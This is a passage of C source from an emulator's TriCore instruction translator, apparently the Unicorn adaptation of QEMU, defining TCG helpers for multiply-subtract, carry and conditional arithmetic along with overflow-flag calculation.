tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rh, rh); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, rh, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); tcg_temp_free_i64(tcg_ctx, t4); } static inline void gen_madds32_q(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv arg3, uint32_t n, uint32_t up_shift) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t1, arg1); tcg_gen_ext_i32_i64(tcg_ctx, t2, arg2); tcg_gen_ext_i32_i64(tcg_ctx, t3, arg3); tcg_gen_mul_i64(tcg_ctx, t2, t2, t3); tcg_gen_sari_i64(tcg_ctx, t2, t2, up_shift - n); gen_helper_madd32_q_add_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, t1, t2); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } static inline void gen_madds64_q(DisasContext *ctx, TCGv rl, TCGv rh, TCGv arg1_low, TCGv arg1_high, TCGv arg2, TCGv arg3, uint32_t n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 r1 = tcg_temp_new_i64(tcg_ctx); TCGv temp = tcg_const_i32(tcg_ctx, n); tcg_gen_concat_i32_i64(tcg_ctx, r1, arg1_low, arg1_high); gen_helper_madd64_q_ssov(tcg_ctx, r1, tcg_ctx->cpu_env, r1, arg2, arg3, temp); tcg_gen_extr_i64_i32(tcg_ctx, rl, rh, r1); tcg_temp_free_i64(tcg_ctx, r1); tcg_temp_free(tcg_ctx, temp); } /* ret = r2 - (r1 * r3); */ static inline void gen_msub32_d(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext_i32_i64(tcg_ctx, t1, r1); tcg_gen_ext_i32_i64(tcg_ctx, t2, r2); tcg_gen_ext_i32_i64(tcg_ctx, t3, r3); tcg_gen_mul_i64(tcg_ctx, t1, t1, t3); tcg_gen_sub_i64(tcg_ctx, t1, t2, t1); tcg_gen_extrl_i64_i32(tcg_ctx, ret, t1); /* calc V t2 > 0x7fffffff */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_GT, t3, t1, 0x7fffffffLL); /* result < -0x80000000 */ tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_LT, t2, t1, -0x80000000LL); tcg_gen_or_i64(tcg_ctx, t2, t2, t3); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t2); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, ret); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } static inline void gen_msubi32_d(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_msub32_d(ctx, ret, r1, r2, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msub64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); TCGv t4 = tcg_temp_new(tcg_ctx); tcg_gen_muls2_tl(tcg_ctx, t1, t2, r1, r3); /* only the sub can overflow */ tcg_gen_sub2_tl(tcg_ctx, t3, t4, r2_low, r2_high, t1, t2); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, t4, r2_high); tcg_gen_xor_tl(tcg_ctx, t1, r2_high, t2); tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, t1); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, t4, t4); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, t4, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back the result */ tcg_gen_mov_tl(tcg_ctx, ret_low, t3); tcg_gen_mov_tl(tcg_ctx, ret_high, t4); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t4); } static inline void gen_msubi64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_msub64_d(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_msubu64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, TCGv r3) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t1, r1); tcg_gen_concat_i32_i64(tcg_ctx, t2, r2_low, r2_high); tcg_gen_extu_i32_i64(tcg_ctx, t3, r3); tcg_gen_mul_i64(tcg_ctx, t1, t1, t3); tcg_gen_sub_i64(tcg_ctx, t3, t2, t1); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, t3); /* calc V bit, only the sub can overflow, if t1 > t2 */ tcg_gen_setcond_i64(tcg_ctx, TCG_COND_GTU, t1, t1, t2); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t1); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, 31); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, ret_high); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, ret_high, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } static inline void gen_msubui64_d(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1, TCGv r2_low, TCGv r2_high, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_msubu64_d(ctx, ret_low, ret_high, r1, r2_low, r2_high, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_addi_d(DisasContext *ctx, TCGv ret, TCGv r1, target_ulong r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, r2); gen_add_d(ctx, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } /* calculate the carry bit too */ static inline void gen_add_CC(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new_i32(tcg_ctx); TCGv result = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, t0, 0); /* Addition and set C/V/SV bits */ tcg_gen_add2_i32(tcg_ctx, result, tcg_ctx->cpu_PSW_C, r1, t0, r2, t0); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, result, r1); tcg_gen_xor_tl(tcg_ctx, t0, r1, r2); tcg_gen_andc_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, t0); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, result); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, result); tcg_temp_free(tcg_ctx, t0); } static inline void gen_addi_CC(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_add_CC(ctx, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_addc_CC(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv carry = tcg_temp_new_i32(tcg_ctx); TCGv t0 = tcg_temp_new_i32(tcg_ctx); TCGv result = tcg_temp_new_i32(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, t0, 0); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_NE, carry, tcg_ctx->cpu_PSW_C, 0); /* Addition, carry and set C/V/SV bits */ tcg_gen_add2_i32(tcg_ctx, result, tcg_ctx->cpu_PSW_C, r1, t0, carry, t0); tcg_gen_add2_i32(tcg_ctx, result, tcg_ctx->cpu_PSW_C, result, tcg_ctx->cpu_PSW_C, r2, t0); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, result, r1); tcg_gen_xor_tl(tcg_ctx, t0, r1, r2); tcg_gen_andc_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, t0); /* Calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV/SAV bits */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, result); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, result); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, carry); } static inline void gen_addci_CC(DisasContext *ctx, TCGv ret, TCGv r1, int32_t con) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, con); gen_addc_CC(ctx, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_cond_add(DisasContext *ctx, TCGCond cond, TCGv r1, TCGv r2, TCGv r3, TCGv r4) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv result = tcg_temp_new(tcg_ctx); TCGv mask = tcg_temp_new(tcg_ctx); TCGv t0 = tcg_const_i32(tcg_ctx, 0); /* create mask for sticky bits */ tcg_gen_setcond_tl(tcg_ctx, cond, mask, r4, t0); tcg_gen_shli_tl(tcg_ctx, mask, mask, 31); tcg_gen_add_tl(tcg_ctx, result, r1, r2); /* Calc PSW_V */ tcg_gen_xor_tl(tcg_ctx, temp, result, r1); tcg_gen_xor_tl(tcg_ctx, temp2, r1, r2); tcg_gen_andc_tl(tcg_ctx, temp, temp, temp2); tcg_gen_movcond_tl(tcg_ctx, cond, tcg_ctx->cpu_PSW_V, r4, t0, temp, tcg_ctx->cpu_PSW_V); /* Set PSW_SV */ tcg_gen_and_tl(tcg_ctx, temp, temp, mask); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, temp, tcg_ctx->cpu_PSW_SV); /* calc AV bit */ tcg_gen_add_tl(tcg_ctx, temp, result, result); tcg_gen_xor_tl(tcg_ctx, temp, temp, result); tcg_gen_movcond_tl(tcg_ctx, cond, tcg_ctx->cpu_PSW_AV, r4, t0, temp, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_and_tl(tcg_ctx, temp, temp, mask); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, temp, tcg_ctx->cpu_PSW_SAV); /* write back result */ tcg_gen_movcond_tl(tcg_ctx, cond, r3, r4, t0, result, r1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, result); tcg_temp_free(tcg_ctx, mask); } static inline void gen_condi_add(DisasContext *ctx, TCGCond cond, TCGv r1, int32_t r2, TCGv r3, TCGv r4) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, r2); gen_cond_add(ctx, cond, r1, temp, r3, r4); tcg_temp_free(tcg_ctx, temp); } static inline void gen_sub_d(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new_i32(tcg_ctx); TCGv result = tcg_temp_new_i32(tcg_ctx); tcg_gen_sub_tl(tcg_ctx, result, r1, r2); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, result, r1); tcg_gen_xor_tl(tcg_ctx, temp, r1, r2); tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, result); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, result); } static inline void gen_sub64_d(DisasContext *ctx, TCGv_i64 ret, TCGv_i64 r1, TCGv_i64 r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 result = tcg_temp_new_i64(tcg_ctx); tcg_gen_sub_i64(tcg_ctx, result, r1, r2); /* calc v bit */ tcg_gen_xor_i64(tcg_ctx, t1, result, r1); tcg_gen_xor_i64(tcg_ctx, t0, r1, r2); tcg_gen_and_i64(tcg_ctx, t1, t1, t0); tcg_gen_extrh_i64_i32(tcg_ctx, tcg_ctx->cpu_PSW_V, t1); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* calc AV/SAV bits */ tcg_gen_extrh_i64_i32(tcg_ctx, temp, result); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp, temp); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, temp, tcg_ctx->cpu_PSW_AV); /* calc SAV */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_i64(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, result); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static inline void gen_sub_CC(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv result = tcg_temp_new(tcg_ctx); TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_sub_tl(tcg_ctx, result, r1, r2); /* calc C bit */ tcg_gen_setcond_tl(tcg_ctx, TCG_COND_GEU, tcg_ctx->cpu_PSW_C, r1, r2); /* calc V bit */ tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, result, r1); tcg_gen_xor_tl(tcg_ctx, temp, r1, r2); tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); /* calc SV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); /* Calc AV bit */ tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, result); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, result, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_AV); /* write back result */ tcg_gen_mov_tl(tcg_ctx, ret, result); tcg_temp_free(tcg_ctx, result); tcg_temp_free(tcg_ctx, temp); } static inline void gen_subc_CC(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_not_tl(tcg_ctx, temp, r2); gen_addc_CC(ctx, ret, r1, temp); tcg_temp_free(tcg_ctx, temp); } static inline void gen_cond_sub(DisasContext *ctx, TCGCond cond, TCGv r1, TCGv r2, TCGv r3, TCGv r4) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv result = tcg_temp_new(tcg_ctx); TCGv mask = tcg_temp_new(tcg_ctx); TCGv t0 = tcg_const_i32(tcg_ctx, 0); /* create mask for sticky bits */ tcg_gen_setcond_tl(tcg_ctx, cond, mask, r4, t0); tcg_gen_shli_tl(tcg_ctx, mask, mask, 31); tcg_gen_sub_tl(tcg_ctx, result, r1, r2); /* Calc PSW_V */ tcg_gen_xor_tl(tcg_ctx, temp, result, r1); tcg_gen_xor_tl(tcg_ctx, temp2, r1, r2); tcg_gen_and_tl(tcg_ctx, temp, temp, temp2); tcg_gen_movcond_tl(tcg_ctx, cond, tcg_ctx->cpu_PSW_V, r4, t0, temp, tcg_ctx->cpu_PSW_V); /* Set PSW_SV */ tcg_gen_and_tl(tcg_ctx, temp, temp, mask); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, temp, tcg_ctx->cpu_PSW_SV); /* calc AV bit */ tcg_gen_add_tl(tcg_ctx, temp, result, result); tcg_gen_xor_tl(tcg_ctx, temp, temp, result); tcg_gen_movcond_tl(tcg_ctx, cond, tcg_ctx->cpu_PSW_AV, r4, t0, temp, tcg_ctx->cpu_PSW_AV); /* calc SAV bit */ tcg_gen_and_tl(tcg_ctx, temp, temp, mask); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, temp, tcg_ctx->cpu_PSW_SAV); /* write back result */ tcg_gen_movcond_tl(tcg_ctx, cond, r3, r4, t0, result, r1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, result); tcg_temp_free(tcg_ctx, mask); } static inline void gen_msub_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_addsub64_h(ctx, ret_low, ret_high, r1_low, r1_high, temp, temp2, tcg_gen_sub_tl, tcg_gen_sub_tl); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubs_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv temp2 = tcg_temp_new(tcg_ctx); TCGv temp3 = tcg_temp_new(tcg_ctx); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } tcg_gen_extr_i64_i32(tcg_ctx, temp, temp2, temp64); gen_subs(ctx, ret_low, r1_low, temp); tcg_gen_mov_tl(tcg_ctx, temp, tcg_ctx->cpu_PSW_V); tcg_gen_mov_tl(tcg_ctx, temp3, tcg_ctx->cpu_PSW_AV); gen_subs(ctx, ret_high, r1_high, temp2); /* combine v bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, tcg_ctx->cpu_PSW_V, temp); /* combine av bits */ tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_AV, temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubm_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_3 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; } tcg_gen_concat_i32_i64(tcg_ctx, temp64_2, r1_low, r1_high); gen_sub64_d(ctx, temp64_3, temp64_2, temp64); /* write back result */ tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64_3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); tcg_temp_free_i64(tcg_ctx, temp64_3); } static inline void gen_msubms_h(DisasContext *ctx, TCGv ret_low, TCGv ret_high, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 temp64_2 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mulm_h, temp64, r2, r3, temp); break; } tcg_gen_concat_i32_i64(tcg_ctx, temp64_2, r1_low, r1_high); gen_helper_sub64_ssov(tcg_ctx, temp64, tcg_ctx->cpu_env, temp64_2, temp64); tcg_gen_extr_i64_i32(tcg_ctx, ret_low, ret_high, temp64); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); tcg_temp_free_i64(tcg_ctx, temp64_2); } static inline void gen_msubr64_h(DisasContext *ctx, TCGv ret, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } gen_helper_subr_h(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, r1_low, r1_high); tcg_temp_free(tcg_ctx, temp); tcg_temp_free_i64(tcg_ctx, temp64); } static inline void gen_msubr32_h(DisasContext *ctx, TCGv ret, TCGv r1, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_temp_new(tcg_ctx); TCGv temp2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp2, r1, 0xffff0000); tcg_gen_shli_tl(tcg_ctx, temp, r1, 16); gen_msubr64_h(ctx, ret, temp, temp2, r2, r3, n, mode); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static inline void gen_msubr64s_h(DisasContext *ctx, TCGv ret, TCGv r1_low, TCGv r1_high, TCGv r2, TCGv r3, uint32_t n, uint32_t mode) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv temp = tcg_const_i32(tcg_ctx, n); TCGv_i64 temp64 = tcg_temp_new_i64(tcg_ctx); switch (mode) { case MODE_LL: GEN_HELPER_LL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_LU: GEN_HELPER_LU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UL: GEN_HELPER_UL(tcg_ctx, mul_h, temp64, r2, r3, temp); break; case MODE_UU: GEN_HELPER_UU(tcg_ctx, mul_h, temp64, r2, r3, temp); break; } gen_helper_subr_h_ssov(tcg_ctx, ret, tcg_ctx->cpu_env, temp64, r1_low, r1_high); 